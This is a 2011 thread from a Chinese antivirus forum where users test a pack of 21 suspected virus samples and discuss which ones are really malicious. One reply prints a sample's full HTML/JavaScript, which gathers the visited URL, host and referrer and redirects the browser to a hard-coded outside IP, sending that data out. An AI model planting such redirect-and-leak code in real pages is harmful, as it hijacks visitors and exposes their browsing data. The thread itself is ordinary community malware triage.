楼主: 爱在雨中停
收起左侧

[病毒样本] 病毒样本21个。。你的杀软能全部处理么?来试试~~

  [复制链接]
K_Ghost!
发表于 2011-5-13 17:53:39 | 显示全部楼层
本帖最后由 K_Ghost! 于 2011-5-13 17:54 编辑

那个外-挂貌似没什么问题CF幽灵透视家庭网吧通用版0423

我运行了再查杀没发现异常 沙箱跑也没发现什么太过分的 不过毕竟是个外-挂...
jefffire
头像被屏蔽
发表于 2011-5-13 17:54:30 | 显示全部楼层
K_Ghost! 发表于 2011-5-13 17:36
gggg.exe 无法运行

一个脚本而已
<html>
<head>

</head>

<script type="text/javascript">
       

var pp = "242&pre="+(new Date()).getTime();
       
var s=String(window.location.href);
var host=escape(s.substring(7,s.indexOf('/',7)));
var ref=escape(document.referrer);
s = escape(s);

function loadfr()
{
        document.getElementById("fr1").src = "http://60.191.124.250/dns.php?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
}

function refreshPage()
{
        document.location = "http://60.191.124.250/dns.php?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
}

if (self.location == top.location)
{
        document.location="http://60.191.124.250/dns.php?AIMT="+s+"&host="+host+"&refer="+ref+"&server="+pp;
}
else
{
        refreshPage();
}

</script>

<frameset rows="*,0">
        <frame id="main" src="">
        <frame id="fr1" src="">
</frameset>

<body>
</body>

</html>


K_Ghost!
发表于 2011-5-13 17:54:59 | 显示全部楼层
回复 62楼 jefffire 的帖子

额 那是我系统的问题了 x64的
jefffire
头像被屏蔽
发表于 2011-5-13 17:55:45 | 显示全部楼层
本帖最后由 jefffire 于 2011-5-13 17:56 编辑
K_Ghost! 发表于 2011-5-13 17:54
回复 62楼 jefffire 的帖子

额 那是我系统的问题了 x64的

不是~~这个本身就是不能运行的。
指向地址已经失效http://60.191.124.250/dns.php
K_Ghost!
发表于 2011-5-13 17:57:05 | 显示全部楼层
还有一个 tuugle_setup 带数字签名好像就是个工具... 这个...为什嘛也算病毒...
K_Ghost!
发表于 2011-5-13 17:59:20 | 显示全部楼层


表示不解啊 楼主从那找到这些样本的
jefffire
头像被屏蔽
发表于 2011-5-13 18:00:37 | 显示全部楼层
爱在雨中停 发表于 2011-5-13 17:49
回复 56楼 jefffire 的帖子

嗯。。学习了。。我还没用过云呢。。。

三个肯定clean
myms.exe     百度插件     
sms-full2011.exe    百度插件     
ones.exe    ones光盘刻录软件

其他还有不少外-挂,不好判断
K_Ghost!
发表于 2011-5-13 18:04:24 | 显示全部楼层
nb.swf是利用漏洞攻击的么...这个压缩成exe云可识别

minchaovip
发表于 2011-5-13 18:04:25 | 显示全部楼层
话不多说
爱在雨中停
 楼主| 发表于 2011-5-13 18:06:20 | 显示全部楼层
回复 66楼 K_Ghost! 的帖子

网上到处下的。。。可疑的就收集起来了的。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-6 04:40 , Processed in 0.096431 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表